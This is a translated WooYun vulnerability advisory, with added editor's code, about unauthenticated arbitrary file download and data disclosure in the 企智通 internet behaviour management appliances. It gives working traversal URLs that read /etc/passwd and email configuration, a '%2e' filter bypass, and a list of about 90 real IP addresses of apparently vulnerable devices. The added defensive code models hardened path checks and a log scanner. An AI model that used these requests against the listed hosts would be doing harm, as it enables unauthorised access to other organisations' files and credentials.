Two arbitrary file traversal & sensitive information disclosure issues in 企智通 series internet behaviour management appliances (no login required)

Vulnerability summary
Defect ID:        WooYun-2015-145925
Title:            Two arbitrary file traversal & sensitive information disclosure issues in 企智通 series internet behaviour management appliances (neither requires login)
Vendor:           北京宽广智通信息技术有限公司 (Beijing Kuanguang Zhitong Information Technology Co., Ltd.)
Author:           YY-2012
Submitted:        2015-10-11 14:20
Published:        2016-01-12 10:58
Type:             Arbitrary file traversal / download
Severity:         High
Self-assessed rank: 20
Status:           Confirmed by vendor
Source:           http://www.wooyun.org; for questions or help contact [email protected]
Tags:             arbitrary file read exploitation, sensitive information disclosure, improper file handling

Disclosure timeline:
2015-10-11:        Details sent to the vendor; awaiting vendor handling
2015-10-14:        Vendor confirmed; details disclosed to the vendor only
2015-10-17:        Details opened to third-party security partners (NSFOCUS 绿盟科技, 唐朝安全巡航)
2015-12-08:        Details opened to core white hats and experts in the relevant field
2015-12-18:        Details opened to regular white hats
2015-12-28:        Details opened to intern white hats
2016-01-12:        Details opened to the public

Brief description: Some devices have already been patched, but the patch merely filters characters.
Details: http://gd.189.cn/biz/introd/infor/xxaq/2011/10/18/10083.htm

Appears to affect every model in the series:

企智通MINI型, 企智通I型, 企智通II型, 企智通III型, 企智通IV型, 企智通V型, 企智通IX型

First arbitrary file traversal (directory traversal is also possible; on some devices the filter can be bypassed by replacing "." with "%2e"):

http://url/test/downTcpdumpFile.jsp?filename=../conf/email.cfg

Second arbitrary file traversal (directory traversal is also possible; on some devices the filter can be bypassed by replacing "." with "%2e"):

http://url/report/rp_download.jsp?file=/etc/passwd&null=null

Sensitive information disclosure (there are too many to list; one example is given and the others follow the same pattern):

http://url/BEAP/user_eqp_batexport.jsp
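Both download pages above take a file name straight from the request, and the report notes that the vendor's interim patch only filters characters, which writing "." as "%2e" defeats. The Python model below is an added editor's example, not the appliance's code: it contrasts a filter-the-string patch with a decode-then-canonicalise containment check, and puts the report's first fix item (an authorisation check) ahead of any file handling. The directory layout, the decode-after-filter ordering that reproduces the bypass, and all function names are assumptions for illustration.

```python
import os
from typing import Optional, Tuple
from urllib.parse import unquote

# Assumed layout for illustration (not taken from the real appliance): the
# capture files the download page is meant to serve live under DOWNLOAD_DIR,
# and nothing outside that directory should be reachable.
WEB_ROOT = "/srv/webapp"
DOWNLOAD_DIR = os.path.join(WEB_ROOT, "test", "tcpdump")


def naive_filter_resolve(filename: str) -> str:
    """Model of a 'just filter the characters' patch.

    The raw parameter is scrubbed of '../' and only afterwards percent-decoded
    (assumed ordering, chosen to reproduce the report's observation that
    '%2e' gets past the filter). Returns the path the handler would open,
    with no containment check at all."""
    scrubbed = filename.replace("../", "")
    decoded = unquote(scrubbed)          # '%2e%2e/' turns back into '../' here
    return os.path.normpath(os.path.join(DOWNLOAD_DIR, decoded))


def safe_resolve(filename: str) -> Optional[str]:
    """Hardened resolution: decode first, accept only a bare file name, then
    prove the canonical result is a direct child of DOWNLOAD_DIR."""
    decoded = unquote(filename)
    if not decoded or "/" in decoded or "\\" in decoded or "\x00" in decoded:
        return None                       # separators and NUL are never valid here
    base = os.path.realpath(DOWNLOAD_DIR)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # The canonical parent must be the download directory itself; this also
    # rejects '.', '..' and symlinks that point elsewhere.
    if os.path.dirname(candidate) != base:
        return None
    return candidate


def handle_download(session_authenticated: bool, filename: str) -> Tuple[int, str]:
    """Request handler model: authorisation runs before the file name is
    even examined, which is the report's first recommended fix."""
    if not session_authenticated:
        return 401, "login required"
    path = safe_resolve(filename)
    if path is None:
        return 400, "invalid file name"
    return 200, path


if __name__ == "__main__":
    for name in ("capture.pcap", "../conf/email.cfg", "%2e%2e/conf/email.cfg"):
        print(f"{name!r:32} naive -> {naive_filter_resolve(name)}")
        print(f"{'':32} safe  -> {safe_resolve(name)}")
```

Running the block shows the naive path for "%2e%2e/conf/email.cfg" landing outside the download directory while the hardened resolver rejects it; the design point is that a string filter can only ever chase encodings, whereas a canonical-path check decides on the path the OS will actually open.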

Proof of vulnerability: present on some of the devices

[screenshot not preserved]

On some devices the filter can be bypassed by replacing "." with "%2e":

[screenshot not preserved]

Directory traversal is also possible:

[screenshot not preserved]

Cases (the same set of cases as wooyun-2015-0139442):

http://202.105.31.122:8888/customer.jsp
https://58.60.63.161/customer.jsp
http://116.6.87.76:8888/customer.jsp
http://219.129.23.92:8888/customer.jsp
https://14.18.144.27/customer.jsp
http://183.63.91.226:8888/customer.jsp
http://58.248.137.84:8888/customer.jsp
http://183.63.226.56:8888/customer.jsp
https://61.145.196.85/customer.jsp
http://119.146.1.2:8888/customer.jsp
https://183.62.21.51/customer.jsp
http://119.130.114.44:8888/customer.jsp
http://119.130.114.74:8888/customer.jsp
http://125.88.35.170:8888/customer.jsp
http://121.10.222.82:8888/customer.jsp
http://202.105.31.123:8888/customer.jsp
https://183.62.27.21/customer.jsp
https://59.41.254.150/customer.jsp
https://202.105.31.125/customer.jsp
http://219.129.31.170/customer.jsp
http://202.105.31.124:8888/customer.jsp
https://202.105.237.210/customer.jsp
https://183.62.21.50/customer.jsp
http://119.130.114.51:8888/customer.jsp
https://183.62.30.3/customer.jsp
http://202.105.31.126:8888/customer.jsp
http://121.13.250.199:8080/customer.jsp
https://183.62.27.22/customer.jsp
http://59.41.70.194:8888/customer.jsp
http://120.236.48.72/customer.jsp
https://183.63.166.179/customer.jsp
http://183.63.226.62:8888/customer.jsp
http://125.89.68.186/customer.jsp
https://61.145.196.89/customer.jsp
http://119.146.1.2/customer.jsp
http://121.8.187.250:8888/customer.jsp
http://58.252.169.206/customer.jsp
https://113.106.152.98/customer.jsp
http://119.145.67.138:8888/customer.jsp
http://183.63.137.154:8888/customer.jsp
https://61.144.72.202/customer.jsp
http://59.38.32.174:8888/customer.jsp
http://183.63.163.202:8888/customer.jsp
http://183.63.164.34:8888/customer.jsp
http://61.144.72.26:8888/customer.jsp
https://14.23.152.82/customer.jsp
http://125.88.35.187:8888/customer.jsp
https://183.62.27.19/customer.jsp
http://119.130.114.68:8888/customer.jsp
http://113.106.170.74:8888/customer.jsp
https://59.34.231.66/customer.jsp
https://183.62.30.6/customer.jsp
http://183.237.7.233:8888/customer.jsp
http://121.33.227.106:8888/customer.jsp
https://125.90.4.154/customer.jsp
http://113.108.143.186:8888/customer.jsp
http://183.63.91.228:8888/customer.jsp
http://219.132.63.186:8888/customer.jsp
http://119.145.16.200:8888/customer.jsp
http://218.14.208.104:8888/customer.jsp
http://183.63.226.53:8888/customer.jsp
http://183.63.165.50:8888/customer.jsp
https://202.105.237.234/customer.jsp
https://202.105.237.198/customer.jsp
https://202.105.237.194/customer.jsp
https://202.105.31.122/customer.jsp
https://183.62.21.52/customer.jsp
https://183.62.27.18/customer.jsp
https://183.62.27.20/customer.jsp
https://219.129.63.146/customer.jsp
https://113.106.104.242/customer.jsp
http://183.63.137.157:8888/customer.jsp
http://113.105.0.68:8888/customer.jsp
http://113.105.0.66:8888/customer.jsp
https://202.105.31.124/customer.jsp
http://202.105.31.125:8888/customer.jsp
https://183.62.30.2/customer.jsp
https://125.89.236.50/customer.jsp
https://219.132.61.10/customer.jsp
https://112.91.177.210/customer.jsp
https://125.90.0.210/customer.jsp
http://121.33.227.107:8888/customer.jsp
http://1.202.96.16:8888/customer.jsp
https://61.131.61.34/customer.jsp
https://59.61.238.158/customer.jsp
http://183.63.129.106:8888/customer.jsp
https://113.98.123.146/customer.jsp

Fix recommendations:
1. Add authorisation checks.

2. Do not push the patch only to the cases listed here; most affected parties are end customers, so push it to every one of them.
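Until the vendor patch reaches every device, the endpoints named in this report are easy to watch for in the appliance's or a reverse proxy's access log. The scanner below is an added example, not part of the report or the vendor's tooling: it percent-decodes each request until stable (so "%2e" and "%252e" are both seen as "."), flags the two download pages when their parameter contains a parent-directory hop or an absolute path, and flags successful hits on the export pages for review. The log lines are constructed for illustration, and the rule names and combined-log-format assumption are the editor's.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# The two download pages named in the report and the parameter each reads.
WATCHED_DOWNLOADS = {
    "/test/downTcpdumpFile.jsp": "filename",
    "/report/rp_download.jsp": "file",
}
# Pages the report lists as disclosing data without a login.
EXPORT_PAGES = {"/BEAP/user_eqp_batexport.jsp", "/customer.jsp"}

# Combined log format; only the fields needed here are captured (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not from any real device), in the same format.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Oct/2015:14:20:01 +0800] "GET /test/downTcpdumpFile.jsp?filename=capture.pcap HTTP/1.1" 200 5120
10.0.0.9 - - [11/Oct/2015:14:21:17 +0800] "GET /test/downTcpdumpFile.jsp?filename=%2e%2e/conf/email.cfg HTTP/1.1" 200 842
10.0.0.9 - - [11/Oct/2015:14:21:40 +0800] "GET /report/rp_download.jsp?file=/etc/passwd&null=null HTTP/1.1" 200 1793
10.0.0.9 - - [11/Oct/2015:14:22:03 +0800] "GET /BEAP/user_eqp_batexport.jsp HTTP/1.1" 200 20480
10.0.0.5 - - [11/Oct/2015:14:23:00 +0800] "GET /index.jsp HTTP/1.1" 200 300
"""


def full_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable, so '%252e' and '%2e' both become '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = full_decode(parts.path)
    finding = {"ip": m.group("ip"), "ts": m.group("ts"),
               "path": path, "status": m.group("status")}
    if path in WATCHED_DOWNLOADS:
        params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
        for raw in params.get(WATCHED_DOWNLOADS[path], []):
            value = full_decode(raw)
            segments = value.replace("\\", "/").split("/")
            # A parent-directory hop or an absolute path asks for something
            # outside the download area, whatever encoding it arrived in.
            if ".." in segments or value.startswith("/"):
                return {**finding, "rule": "path-traversal", "value": value}
    if path in EXPORT_PAGES and m.group("status") == "200":
        return {**finding, "rule": "sensitive-export-access", "value": ""}
    return None


def scan(log_text: str) -> List[Dict[str, str]]:
    """Run classify over every line and keep the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        f = classify(line)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["rule"], f["path"], f["value"])
```

Splitting the decoded value into path segments before testing for ".." avoids false positives on names such as "report..bak", and decoding to a fixed point rather than once is what keeps the check aligned with whatever the application ends up opening.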


Copyright notice: please credit the source, YY-2012@乌云 (WooYun), when reposting.

Vulnerability response
Vendor response:
Severity: Medium

Rank: 8
Confirmed at: 2015-10-14 10:57
Vendor reply: Apologies, we only just saw the vulnerability report. Testing confirms the issue exists, and we are organising a fix and upgrade plan.
Latest status: none
Original: http://www.wooyun.org/bugs/wooyun-2015-0145925
